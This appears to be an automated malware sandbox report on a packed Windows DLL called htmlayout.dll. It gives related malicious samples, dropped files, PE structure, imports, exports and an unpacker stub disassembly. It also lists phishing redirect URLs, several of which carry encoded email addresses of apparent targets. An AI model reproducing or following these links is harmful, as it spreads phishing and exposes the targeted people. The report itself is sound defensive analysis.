	https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-lsanders#bHNhbmRlcnNAdHJnYXJ0cy5jb20=	Get hash	malicious	Browse	86.48.1.129
	Document.exe	Get hash	malicious	Browse	86.48.29.24
	https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://cjk6rs.codesandbox.io/hh-bryan_russell#YnJ5YW5fcnVzc2VsbEBiaW8tcmFkLmNvbQ==	Get hash	malicious	Browse	86.48.1.129
	Document.exe	Get hash	malicious	Browse	86.48.29.24
	SecuriteInfo.com.W32.Formbook.AA.tr.15260.exe	Get hash	malicious	Browse	86.48.29.24
	DtXjxfIMmv.elf	Get hash	malicious	Browse	86.58.241.117
	SecuriteInfo.com.Win32.TrojanX-gen.1760.exe	Get hash	malicious	Browse	86.48.25.60
	VBCpxrl2G2.exe	Get hash	malicious	Browse	86.48.20.106
	lfYru0uB7i	Get hash	malicious	Browse	86.48.211.192
	home.arm	Get hash	malicious	Browse	86.48.211.160
	D5AeSqq60p.dll	Get hash	malicious	Browse	81.7.195.31
	rfPNd4LGRl	Get hash	malicious	Browse	86.58.252.65
CLOUDFLARENETUS	doc_Factura_94670.html	Get hash	malicious	Browse	104.17.70.176
	Benefits_Enrollment.shtml	Get hash	malicious	Browse	104.18.11.207
	xO5fHYl7CQ.elf	Get hash	malicious	Browse	1.2.9.185
	KeLj9XZLwi.elf	Get hash	malicious	Browse	1.13.147.38
	3ts2As2Bkm.exe	Get hash	malicious	Browse	172.67.201.26
	Qeh843KFOM.exe	Get hash	malicious	Browse	162.159.133.233
	zDEy5LlqAw.elf	Get hash	malicious	Browse	104.17.222.236
	http://www.kylock.com/index.php	Get hash	malicious	Browse	188.114.97.3
	Confirmation transfer Ref No_00101334632192.exe	Get hash	malicious	Browse	188.114.96.3
	QXt73akSrt.exe	Get hash	malicious	Browse	188.114.97.3
	620000.vbc.exe	Get hash	malicious	Browse	172.67.34.170
	1.exe	Get hash	malicious	Browse	188.114.96.3
	1.exe	Get hash	malicious	Browse	188.114.97.3
	1.exe	Get hash	malicious	Browse	188.114.96.3
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	Browse	172.67.186.195
	FA74917B3412CF02CEB60DE07292B3B5AD1B9553CF2B4.exe	Get hash	malicious	Browse	172.67.172.157
	https://www.msn.com/en-gb/lifestyle/rf-best-products-uk/redirect?rf_dws_location=&rf_item_id=370742304&rf_list_id=112955&rf_partner_id=B089YK1QNQ&rf_source=amazon&url=aHR0cHM6Ly9jYmZ2di50b3A/ZT1kRzl0TG1Oc1lYSnJRR1poYVhSb2RHVmphRzV2Ykc5bmFXVnpMbU52YlE9PSM	Get hash	malicious	Browse	104.16.169.131
	szA4lh2gwu.exe	Get hash	malicious	Browse	162.159.135.233
	http://2no.co	Get hash	malicious	Browse	104.16.201.58
	https://pddf.pages.dev/	Get hash	malicious	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170
	file.exe	Get hash	malicious	Browse	104.20.67.143 104.20.68.143 172.67.34.170

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1cd283d2586cbda5269bf614f7f69152af741d7f_82810a17_03591099\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0215467458793408
Encrypted:	false
SSDEEP:	192:5XdiA0oXvPHBUZMX4jed+RZKsD/u7scS274It7c:jiWXvPBUZMX4jes/u7scX4It7c
MD5:	4B69A3666F89E85953D70AFEC29DFD9D
SHA1:	B10B9ACEF7A762B4C0AF1124987579D19A91178A
SHA-256:	667FFAAB0792BBD3D4489542FA030C1C3810DAEDA340219579E21DCB349A9745
SHA-512:	B0D70D3CCD2F0C3E030F8FD89EF224C86C0A6FDB8AA172DBE4D9AE8452E66A53C6879C8E222E5FCDA20785D84833D95685691786CF81093542AB2BC8BFFD0278
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.6.9.5.0.8.4.6.2.9.9.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.6.9.5.0.8.9.7.2.9.8.9.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.2.f.e.5.e.f.-.c.6.f.e.-.4.d.8.6.-.8.f.c.b.-.a.f.2.a.1.4.0.1.7.1.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.3.e.0.8.1.a.-.b.4.1.d.-.4.9.0.3.-.a.8.f.2.-.6.c.e.b.3.b.0.6.7.2.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.0.-.0.0.0.1.-.0.0.1.f.-.4.b.5.8.-.7.3.2.c.7.2.0.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD342.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Dec 5 06:24:48 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	47002
Entropy (8bit):	2.159034443727257
Encrypted:	false
SSDEEP:	192:XLc2BKUvRgUtO5SkbD3TQtWfOkXmu8SzQNl8iVPYDCZnBKI+:hRgJ5LbD0e4xVVwDkA1
MD5:	804867D39482879662E4186FB168B4A1
SHA1:	6CBEE7055BBE8AEE775469CF79DEA88B8FFFB664
SHA-256:	74406004B250A9C638D55D4418349B3165E01F6BEDDCD33D8EDF747B5C8F0B98
SHA-512:	5828FFB0D91FF26C13B22008BD2B7C0E37AA71B72C90110266EB4FC62CD07A0055EBFBFC3D3D27D076D440840A8A0866D46B1B2547EFE72EFD975428DF088E29
Malicious:	false
Preview:	MDMP....... ..........c.........................................3..........T.......8...........T.......................................!...................................................................U...........B......0"......GenuineIntelW...........T..............c.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4D7.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.6880641761395747
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi84696Ymd6zSgmf8EoSaCprX89bzUhwsf03xm:RrlsNiL696YE6zSgmf8EoSazMfv
MD5:	86AC64E872C4374DB9EBF5C88DE2E8F8
SHA1:	461AE2E1DF230D2BAF4C3C71C06F908BE54E1403
SHA-256:	19129FD37BBF9475AD80A061B2407DB5C5C7A8024ACE743DD712CBC5A4F0603A
SHA-512:	FC170C0B9DD0A0C829AE80A4A7B8036761FCCFC97FCEEAB46F84A64E90FA6D19B9605D5F1C377CB0346C90B4681F10FCBECC5E4557C864DD142827E304843761
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE593.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4729
Entropy (8bit):	4.441701455791416
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9WYWgc8sqYjHb8fm8M4JCdsqFD+q8vjsT4SrSnd:uITfh5RgrsqYMJaKMDWnd
MD5:	3350E94084E8774E1519CCFE9F54F284
SHA1:	581DD5AA8299569F5F78FB6B4FF2287E9A9E6BE5
SHA-256:	49F224E98E392CAABE77671A2C697CFEE73A86DBED4AD13EBA8BEEB90A0B3A52
SHA-512:	592BBE46C2F6313984FC451B2F9D19F93B386F91BC65744707E643773EFA8CFFA1E7DA842887724FBE0B0A13D13719A313DE1964F952A005D2E470CCACB2EB23
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1809575" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\user\128757

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.1976360714607175
Encrypted:	false
SSDEEP:	3:oKXFQg0jZVGrDBgwf1jJRXFQg0jZVs:zrBPT
MD5:	040ECDF65C107F7C1D7EEF47E2F57478
SHA1:	8BAC019C51F125E9716FA1706A546E6C14A6E7D8
SHA-256:	E7CE8614F1DA20BBFAE87E08AB1429BC13CC4DCA25ED1DD3DA300646DC4AD5E7
SHA-512:	96544A0970B5A95879B1189EE52632C9F9D159C04127FD9F12BF46280D4C6384E546B4B81A3BB4F141BC8E68631F2574047D98795B404A5AFEB083D236B3FE25
Malicious:	false
Preview:	EC1533271D65E46F9BF90500..B5D770E651..[BACKUP0]..EC1533271D65E46F9BF90500..

C:\Users\user\AppData\Local\128757

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.390319531114783
Encrypted:	false
SSDEEP:	3:1EypyqIPsy:1XpyRPh
MD5:	26D807B51D33180C20B728CB4D9E006F
SHA1:	3F2CE8BF16162D47DDE567C14830A2014395BD0C
SHA-256:	F6349BA34A6553A7B8D0433465A96C299599C966BE05F6A2E66B13E91A82F3FE
SHA-512:	F9932291C157B2996E890646626FEF2135CC10DFB05F552E1BF7A3A2759A090E23829B8A99E23632C7C0A50F9BCBB7A138E263D0D0AB74B5EE15C021C2A48679
Malicious:	false
Preview:	[Generate Pasta]..EjqOUSqiHMjI..

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.968572135646623
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	htmlayout.dll
File size:	20644864
MD5:	dcdb484d09c7a99de645eb72c99ef4b7
SHA1:	2a52d8f4c2f3eb803b7b0431b9d505ed28e7c6f1
SHA256:	d35344f20096889139064c915d3b9b865b81bfa7af97167190c2ebfc7bdf3859
SHA512:	dab0e8d159d7d3752d0777b88bfd22fce2b86bcfbe4112a7faa968c58f6b9189723bb0ef06fcf6b498a10d5cf4410aecd5ec44c95dea01c1d601327056e73159
SSDEEP:	393216:U2BshnNGVR+FuzG2ni1lq2IsaClTYnrlcJ/QOKLap2Ber8XyRVUyfkyO8:U3hNGH+LBbbflQpc5QGpD8ww5
TLSH:	F02733631280BE56E122C2BAAC2256484C15F272CE057474F81F4EF5C09B66DDFBDBB9
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x2f3f058
Entrypoint Section:	.boot
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x63844C29 [Mon Nov 28 05:50:33 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	efc5ba05a0955b6e73b95069770f4caa

Entrypoint Preview

Instruction
call 00007FE2A4E54370h
push ebx
mov ebx, esp
push ebx
mov esi, dword ptr [ebx+08h]
mov edi, dword ptr [ebx+10h]
cld
mov dl, 80h
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FE2A4E5420Ch
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FE2A4E54273h
xor eax, eax
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FE2A4E54307h
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
je 00007FE2A4E5422Ah
push edi
mov eax, eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
jmp 00007FE2A4E541BBh
mov eax, 00000001h
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FE2A4E5420Ch
sub eax, ebx
mov ebx, 00000001h
jne 00007FE2A4E5424Ah
mov ecx, 00000001h
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc ecx, ecx
add dl, dl
jne 00007FE2A4E54227h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jc 00007FE2A4E5420Ch
push esi
mov esi, edi
sub esi, ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x14f7000	0x1a8a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14f91a2	0x1a0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14fa000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x426000	0xac6
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x3fd2f8	0x162800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x3ff000	0x2920	0x1600	False	0.9982244318181818	data	7.905526374226113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x402000	0x17908	0xb200	False	0.9926044592696629	data	7.940066317077602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x41a000	0x6f78	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x421000	0x424e	0x600	False	0.8951822916666666	data	7.04156579998244	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x426000	0xac6	0x400	False	1.0107421875	data	7.542388517876041	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x427000	0x1a8a	0xa00	False	0.96484375	data	7.731488360073949	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x429000	0x44	0x200	False	0.849609375	data	6.443682514600191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x42a000	0x58884	0x31200	False	0.9994483540076335	data	7.969033850722755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x483000	0x1073400	0x358800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.edata	0x14f7000	0x1c00	0x1c00	False	0.30454799107142855	data	5.296088156361843	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x14f9000	0x1000	0x400	False	0.4013671875	data	3.729841525615709	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x14fa000	0x1000	0x800	False	0.30859375	data	2.6783943012560316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida	0x14fb000	0x1644000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot	0x2b3f000	0xeb3600	0xeb3600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_STRING	0x14fa090	0x36c	data
RT_VERSION	0x14fa40c	0x200	Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
oleaut32.dll	SysFreeString
advapi32.dll	RegQueryValueExW
user32.dll	CharNextW
gdi32.dll	UnrealizeObject
version.dll	VerQueryValueW
netapi32.dll	NetApiBufferFree
ole32.dll	OleUninitialize
shell32.dll	Shell_NotifyIconW
msvcrt.dll	sprintf
comctl32.dll	InitializeFlatSB
winspool.drv	OpenPrinterW
wsock32.dll	WSACleanup
Magnification.dll	MagSetImageScalingCallback

Exports

Name	Ordinal	Address
HTMLayoutAnimateElement	209	0x7f238c
HTMLayoutAppendMasterCSS	208	0x7f238c
HTMLayoutAttachEventHandler	207	0x7f238c
HTMLayoutAttachEventHandlerEx	206	0x7f238c
HTMLayoutCallBehaviorMethod	205	0x7f238c
HTMLayoutClassNameA	204	0x7f238c
HTMLayoutClassNameW	203	0x7f238c
HTMLayoutClearAttributes	202	0x7f238c
HTMLayoutClipboardCopy	201	0x7f238c
HTMLayoutCloneElement	200	0x7f238c
HTMLayoutCombineURL	199	0x7f238c
HTMLayoutCommitUpdates	198	0x7f238c
HTMLayoutControlGetType	197	0x7f238c
HTMLayoutControlGetValue	196	0x7f238c
HTMLayoutControlSetValue	195	0x7f238c
HTMLayoutCreateElement	194	0x7f238c
HTMLayoutDataReady	193	0x7f238c
HTMLayoutDataReadyAsync	192	0x7f238c
HTMLayoutDeclareElementType	191	0x7f238c
HTMLayoutDeleteElement	190	0x7f238c
HTMLayoutDetachElement	189	0x7f238c
HTMLayoutDetachEventHandler	188	0x7f238c
HTMLayoutDialog	187	0x7f238c
HTMLayoutElementGetExpando	186	0x7f238c
HTMLayoutElementSetExpando	185	0x7f238c
HTMLayoutEnqueueMeasure	184	0x7f238c
HTMLayoutEnumElementStyles	183	0x7f238c
HTMLayoutEnumResources	182	0x7f238c
HTMLayoutEnumResourcesEx	181	0x7f238c
HTMLayoutEnumerate	180	0x7f238c
HTMLayoutFindElement	179	0x7f238c
HTMLayoutGetAttributeByName	178	0x7f238c
HTMLayoutGetAttributeCount	177	0x7f238c
HTMLayoutGetCharacterRect	176	0x7f238c
HTMLayoutGetChildrenCount	175	0x7f238c
HTMLayoutGetElementByUID	174	0x7f238c
HTMLayoutGetElementHtml	173	0x7f238c
HTMLayoutGetElementHtmlCB	172	0x7f238c
HTMLayoutGetElementHwnd	171	0x7f238c
HTMLayoutGetElementIndex	170	0x7f238c
HTMLayoutGetElementInnerText	169	0x7f238c
HTMLayoutGetElementInnerText16	168	0x7f238c
HTMLayoutGetElementInnerTextCB	167	0x7f238c
HTMLayoutGetElementIntrinsicHeight	166	0x7f238c
HTMLayoutGetElementIntrinsicWidths	165	0x7f238c
HTMLayoutGetElementLocation	164	0x7f238c
HTMLayoutGetElementState	163	0x7f238c
HTMLayoutGetElementText	162	0x7f238c
HTMLayoutGetElementType	161	0x7f238c
HTMLayoutGetElementUID	160	0x7f238c
HTMLayoutGetFocusElement	159	0x7f238c
HTMLayoutGetGraphin	158	0x7f238c
HTMLayoutGetMinHeight	157	0x7f238c
HTMLayoutGetMinWidth	156	0x7f238c
HTMLayoutGetNthAttribute	155	0x7f238c
HTMLayoutGetNthChild	154	0x7f238c
HTMLayoutGetParentElement	153	0x7f238c
HTMLayoutGetRootElement	152	0x7f238c
HTMLayoutGetScrollInfo	151	0x7f238c
HTMLayoutGetSelectedHTML	150	0x7f238c
HTMLayoutGetStyleAttribute	149	0x7f238c
HTMLayoutHidePopup	148	0x7f238c
HTMLayoutHttpRequest	147	0x7f238c
HTMLayoutInit	146	0x7f238c
HTMLayoutInsertElement	145	0x7f238c
HTMLayoutIsElementEnabled	144	0x7f238c
HTMLayoutIsElementVisible	143	0x7f238c
HTMLayoutLoadFile	142	0x7f238c
HTMLayoutLoadHtml	141	0x7f238c
HTMLayoutLoadHtmlEx	140	0x7f238c
HTMLayoutMoveElement	139	0x7f238c
HTMLayoutMoveElementEx	138	0x7f238c
HTMLayoutParseValue	137	0x7f238c
HTMLayoutPostEvent	136	0x7f238c
HTMLayoutProc	135	0x7f238c
HTMLayoutProcND	134	0x7f238c
HTMLayoutProcW	133	0x7f238c
HTMLayoutProcessUIEvent	132	0x7f238c
HTMLayoutRangeAdvancePos	131	0x7f238c
HTMLayoutRangeCreate	130	0x7f238c
HTMLayoutRangeFromPositions	129	0x7f238c
HTMLayoutRangeFromSelection	128	0x7f238c
HTMLayoutRangeInsertHtml	127	0x7f238c
HTMLayoutRangeIsEmpty	126	0x7f238c
HTMLayoutRangeRelease	125	0x7f238c
HTMLayoutRangeReplace	124	0x7f238c
HTMLayoutRangeToHtml	123	0x7f238c
HTMLayoutRender	122	0x7f238c
HTMLayoutRenderElement	121	0x7f238c
HTMLayoutRequestElementData	120	0x7f238c
HTMLayoutScrollToView	119	0x7f238c
HTMLayoutSelectElements	118	0x7f238c
HTMLayoutSelectElementsW	117	0x7f238c
HTMLayoutSelectParent	116	0x7f238c
HTMLayoutSelectParentW	115	0x7f238c
HTMLayoutSelectionExist	114	0x7f238c
HTMLayoutSendEvent	113	0x7f238c
HTMLayoutSetAttributeByName	112	0x7f238c
HTMLayoutSetCSS	111	0x7f238c
HTMLayoutSetCallback	110	0x7f238c
HTMLayoutSetCapture	109	0x7f238c
HTMLayoutSetDataLoader	108	0x7f238c
HTMLayoutSetElementHtml	107	0x7f238c
HTMLayoutSetElementInnerText	106	0x7f238c
HTMLayoutSetElementInnerText16	105	0x7f238c
HTMLayoutSetElementState	104	0x7f238c
HTMLayoutSetEventRoot	103	0x7f238c
HTMLayoutSetHttpHeaders	102	0x7f238c
HTMLayoutSetMasterCSS	101	0x7f238c
HTMLayoutSetMediaType	100	0x7f238c
HTMLayoutSetMode	99	0x7f238c
